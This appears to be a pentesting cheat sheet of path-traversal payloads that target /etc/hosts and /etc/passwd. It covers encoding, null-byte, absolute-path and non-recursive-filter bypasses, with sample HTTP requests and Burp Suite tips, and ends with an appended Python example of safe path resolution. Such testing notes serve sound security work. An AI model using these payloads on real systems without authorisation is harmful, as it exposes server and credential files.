[DIRECTORY/PATH TRAVERSAL]
GENERAL COMMANDS
DESCRIPTION: Collection of commands to use when testing for path/directory traversal.

C1: ../../../../etc/hosts
C2: ..././..././..././..././..././..././..././..././etc/hosts | 3-1 METHOD, bypasses a filter that strips "../" non-recursively (only once)
C3: /etc/hosts | absolute path bypass

Try:
* Nullbyte | %00
* Encoding
* Double Encoding
* UTF-8 Encoding | WAF bypass
C4: ..././etc/hosts
C5: ..;/etc/hosts | URL-DECODING

NOTE: Encode one, two and three times. It is slow, but it is important to test whether any encoding level can be used to bypass the control. [burpsuite > ctrl + u (encode) | ctrl + shift + u (decode)]

SAMPLES:
> encoded 1 time
C1: ..%2f..%2f..%2fetc/hosts
> encoded 2 times
C2: ..%252f..%252f..%252fetc/hosts

NOTE:
1. All of them can be tested with 1, 2 or any number of [../] segments as needed; every application behaves differently. If needed, SNIPER ATTACK! (or similar). Also invert the symbol: use a backslash and try it. ["..\"]
2. It is good to enable all columns in burpsuite to see the entire picture. [MIME Type Filters]

CHECK THE FOLLOWING LINK, >>> FILE SYSTEM >>> It can be used to check valuable files per OS.

VALIDATIONS

> SPECIFIC PATHS
SAMPLE:
GET /image?filename=/var/www/img/24.jpg HTTP/2
Host: machetevault.github.io
Cookie: session=j5QWoOCqRn5B2jGgronDtpWr6Vz055yb
NOTE: Sometimes there is some kind of validation in place as a countermeasure against path traversal. It may expect the same base path and validate only that, so the attempts can still be executed. [absolute, encoded, non-recursive, etc.]
SAMPLE: GET /image?filename=/var/www/images/../../../etc/passwd
C1: ../../../../etc/hosts

> FILE EXTENSION
NOTE:
1. If it is validating the extension, intercept the request > send the request to repeater and change the extension.
2. Check the headers to see if there is some place indicating what it is accepting.

> NULL VALIDATION
You can use the value %00 to test for null validation. Sometimes you find this vulnerability when the application is retrieving images, files and more.
SAMPLE: GET /image?filename=../../../etc/hosts%00.png HTTP/2
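The following is an added example (not from this note) showing, on the server side, why the non-recursive strip and the prefix-only validation described above are bypassable, next to a resolver that canonicalises the decoded path and checks it stays under the root. IMAGE_ROOT, ALLOWED_EXT and the function names are assumptions for the /image?filename= endpoint.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

IMAGE_ROOT = "/var/www/images"          # assumed root of the /image?filename= endpoint
ALLOWED_EXT = (".png", ".jpg", ".jpeg")  # assumed allow-list of servable extensions


def naive_strip(filename: str) -> str:
    """Non-recursive filter from the note: removes '../' once, so '..././' collapses to '../'."""
    return filename.replace("../", "")


def naive_prefix_check(filename: str) -> bool:
    """Validation that only checks the expected path prefix; traversal after the prefix passes."""
    return filename.startswith(IMAGE_ROOT + "/")


def fully_decode(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable, covering the single, double and triple encoding the note tests."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def resolve_image(filename: str, root: str = IMAGE_ROOT) -> Optional[str]:
    """Canonical path of `filename` under `root`, or None when the request must be rejected."""
    decoded = fully_decode(filename)
    if "\x00" in decoded:                  # null byte would truncate the name in C-backed file APIs
        return None
    decoded = decoded.replace("\\", "/")   # treat backslash as a separator before normalising
    if decoded.startswith("/"):            # absolute path: the client never supplies the root
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    if posixpath.commonpath([root, candidate]) != root:  # escaped the root after normalisation
        return None
    if not candidate.lower().endswith(ALLOWED_EXT):      # extension checked on the final path, not the input
        return None
    return candidate
```

Checking the canonical path rather than stripping or prefix-matching the raw input means the encoded, backslash and ..././ variants all collapse to the same decision.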
©® - 2023/2024.